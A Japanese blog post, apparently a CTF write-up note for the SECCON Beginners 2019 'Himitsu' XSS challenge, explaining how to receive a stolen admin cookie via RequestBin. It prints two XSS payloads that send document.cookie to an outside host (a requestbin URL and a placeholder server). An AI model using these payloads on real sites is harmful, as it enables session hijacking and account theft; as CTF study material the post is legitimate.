セキュリティ系の勉強・その他開発メモとか雑談. Twitter, ブログカテゴリ一覧
本ブログはあくまでセキュリティに関する情報共有の一環として作成したものであり,公開されているシステム等に許可なく実行するなど、違法な行為を助長するものではありません.

【XSS】CTFでcookieを自サーバに送る問題

//

前置き

SECCON for Beginners ctf 2019で、Himitsuという問題が出題されました。とりあえず、そのWrite-upに関しては他の方のを参考にしてください。

teppay.hatenablog.com

st98.github.io


で、この問題管理人のcookieを奪うために、XSScookieを自分のサーバに送ってもらう処理を書かなければいけないのですが、あいにく自分のサーバを立てていないので壁にぶつかります。その時の解決法書きます。

RequestBin

このサイトです。

requestbin.fullcontact.com


このサイトはリクエストを受け取れる場所を生成し、その内容を見ることができます。APIを試し打ちしてみるなどの用途がありそうです。で、ここにアクセスする際にパラメータにcookieを含めるよう設定したらOKです。

<script>(new Image).src='http://requestbin.fullcontact.com/xxxxxxx?'+document.cookie</script>

あくまでHTTPのサイトなので、HTTPSからのリクエスト出せなさそう?下のスクリプトはエラーでリクエストが飛びません。

<script>fetch('http://<my_server>/?'+document.cookie)</script>

他にも色々やり方はあると思います。が、知識不足なので例があげられませんごめんなさい。